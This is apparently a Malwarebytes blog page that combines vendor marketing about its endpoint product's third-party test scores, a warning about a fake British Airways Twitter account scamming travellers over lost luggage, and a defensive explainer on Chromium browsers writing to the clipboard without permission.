Malwarebytes Endpoint Protection continues to receive outstanding results in third-party testing. Our recent participation in two highly-regarded industry evaluations, namely MRG-Effitas and Info-Tech’s Data Quadrant Report, reflects our belief that continual testing and unbiased validation are crucial to our mission to deliver easy, effective, and efficient cyber protection for customers. 

Info-Tech’s Data Quadrant report: Malwarebytes ranks #2 overall and #1 across several key areas

Using data collected from real end users, Info-Tech’s Data Quadrant Reports provide a holistic, unbiased view of the product landscape to help you determine which product is right for your organization. Malwarebytes ranked #2 out of 14 organizations in the report, earning a composite satisfaction score of 8.8.


Malwarebytes also took the #1 spot for three different categories: 

  1. Usability And Intuitiveness (Shallow end user learning curve): 87% user satisfaction 

  2. Vendor Support (Offers quality support): 84% user satisfaction 

  3. Flexible Deployment Options (Supports on-premise, cloud and hybrid IT environments): 87% satisfaction

MRG Effitas 360° Assessment & Certification: Badges across the board

MRG Effitas, a world leader in independent IT research, published its antivirus efficacy assessment results in August 2022. We achieved the highest possible score (100%) for a fourth consecutive quarter and received certifications for Level 1 (the highest ranking awarded by MRG Effitas), Exploit, Online Banking, and Ransomware.

Tested and published in a separate report, our mobile product also achieved the MRG Android 360 degree certification. 


Malwarebytes Endpoint Protection blocked a wide range of ransomware, fileless attacks and other threats:

  • 100 percent of “in the wild” threats blocked: Tested malware considered as ‘zero-day’, delivered by URLs 

  • 100 percent of ransomware blocked: Tested in-house ransomware samples (no known signatures or community verdicts possible)

  • 100 percent of financial malware blocked: Tested financial malware used in the Magecart credit card-skimming attack

  • 100 percent of fileless attacks blocked: Tested to see how security products protect against a specific exploitation technique

  • 100 percent of PUA/adware blocked: Tested potentially unwanted applications (PUA), that are not malicious, but are generally considered unsuitable for most home or business networks.

Malwarebytes Endpoint Protection also delivered the fourth best performance rating of all tested vendors, and did it with zero false positives, providing further evidence that the Malwarebytes EP delivers the right combination of powerful detection without affecting overall operating system performance.

Easy, effective, and efficient cyber protection validated by third-party testing

Malwarebytes is committed to regularly subjecting our solutions to third-party testing.

Third-party testing is critical to ensuring that your endpoint security solution performs well where it counts, whether that’s ease-of-use, rate of false positives, percentage of threats blocked, and so on. To read more about what customers have to say about Malwarebytes Endpoint Protection and EDR, check out our case studies page.

More resources

Why MRG-Effitas matters to SMBs

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Why MITRE matters to SMBs

British Airways customers targeted in lost luggage Twitter scam

Getting back into the travel habit? Jumping on a plane soon? Experienced a bit of a luggage disaster and looking for help on social media? Watch out, because a lack of prior research could prove very costly.

Word has spread of a bogus Twitter account pretending to be a customer support channel of British Airways. Now suspended, the fraud operation seems to have taken a fair bit of cash before being shut down. 

Lose your luggage, find a fraud

People posting about missing luggage on Twitter quickly found their replies filling up with offers to help from a non-verified account purporting to be British Airways. The account asked for phone numbers and likely pushed for additional contact via Twitter’s private message system.

Unfortunately, these offers of help quickly turned sour. The scam account requested various forms of payment to help recover the missing luggage. Although the fakers have been suspended, a lot of replies sent their way still exist. Looking through, we can see at least one individual who was initially told that her luggage was “lost in Dallas”. To move things along, a request for payment was made using the payment system Wise.

Though the initial request was for a small amount, the scammers quickly ramped things up, and it wasn’t long before the victim complained that they were being asked for even more money. Eventually, they claim to have lost out on no less than a thousand US dollars. Of course, they still don’t have any idea where their luggage has ended up. Taking these amounts from people who are overseas, with no belongings, and a now potentially cleaned out bank account is quite the vicious approach.

Avoiding the luggage assistance fakers

Here are some things you should do, and be aware of, when in transit.

  • Airlines are not going to ask for additional fees or payment to help you look for your bags.
  • Be wary of non-verified accounts replying to you. Is it asking for additional personal details? Phone numbers? Payment? Why?
  • Go directly to the source. Use official websites, verified support channels, phone numbers listed on those official websites. You can pretend to be anyone you like on social media, and this is a ripe field for potentially costly scams.
  • If you’re still not sure of the authenticity of an account you’re dealing with, go to the airport help desk. If you’ve realised your bags are missing, you’re almost certainly still in the terminal. Make full use of their availability and ensure everything and everyone you’re interacting with is the real deal.

As people slowly start to get back into the swing of travel, it’s inevitable that fraudsters will do as much as they can to rip those travellers off in any way they can. Customer support is great, but it pays to be mindful when ringing the help alarm. You never quite know who’s going to show up in response.

Chromium browsers can write to the system clipboard without your permission

If you are a user of Google Chrome or any other Chromium-based web browser, then websites may push anything they want to the operating system’s clipboard without your permission or any user interaction. This means that by simply visiting a website, the data on your clipboard may be overwritten without your consent or knowledge.

Clipboard

In layman’s terms, the clipboard is where the data lives while you copy and paste, or cut and paste for that matter. Copying and pasting is such an essential part of our daily computing that most of us just do it automatically. And it can lead to undesirable results if something outside of our control decides to interfere. For example, if you used the “cut” action on a certain piece of text with the intention to paste it somewhere else, it can be a nasty surprise if something completely different gets pasted, and due to using the cut rather than copy, you may have lost the original.

Gestures

Firefox and Safari do require a user gesture before websites can copy content to the device’s clipboard. User gesture in this context means that the user is selecting content on the site and using Ctrl+C or other means to copy it to the clipboard. Chrome and other Chromium-based browsers currently have no such restriction.

Demonstration

If you’d like to see this demonstrated or if you want to check if you are somehow protected against this happening, you can visit the Webplatform News website to test your browser. All it takes is to visit the site and check the content of the clipboard afterwards. You can check the content by “pasting” to an empty text editor like Notepad. Should you get the following message in your clipboard, the browser is vulnerable to unauthorized clipboard manipulation:

“Hello, this message is in your clipboard because you visited the website Web Platform News in a browser that allows websites to write to the clipboard without the user’s permission. Sorry for the inconvenience. For more information about this issue, see https://github.com/w3c/clipboard-apis/issues/182.”

Windows clipboard manager

For Windows 10 and 11 users there is a way to retrieve overwritten items from your clipboard. These Windows versions come with a clipboard manager, although it does need to be turned on first. This can be done in the Settings menu on your computer. Under System, you’ll find a section called Clipboard. Toggle the switch behind Clipboard history to On. Windows will now start keeping track of your clipboard content. To review the history (up to 25 items), press Win+V.

Not new

At Malwarebytes Labs we wrote about clipboard poisoning attacks on the Mac back in 2016. The take-away from that article in the current context is that by pasting in a sensitive place, like the Terminal on a Mac, or a Command Prompt on a Windows machine, text can become a command that gets executed.

Broken

In his article about the clipboard issue, developer Jeff Johnson states that the user gesture requirement for writing to the clipboard was accidentally broken in version 104. And although the vulnerability has been flagged, fixing it may be delayed because it breaks other functionality. Apparently, adding a user gesture requirement for the readText and writeText APIs breaks NTP doodle sharing. NTP (New Tab Page) Google doodles are animations that appear in some cases in Chrome when a new tab is opened. Personally, I wouldn’t miss them at all.

Mitigation

While we wait for a fix, threat actors may come up with ways to abuse this temporary vulnerability. Here are some things you can do to stay on the safe side:

  • Do not open webpages between any cut/copy and paste actions.
  • Check the content of your clipboard before you paste into any sensitive areas. You can use any clipboard manager or just paste into a text field to see what is currently there. For those of you doing financial transactions this is always worth considering, since there is malware out there that can change bitcoin addresses and bank account numbers on your clipboard.

Stay safe, everyone!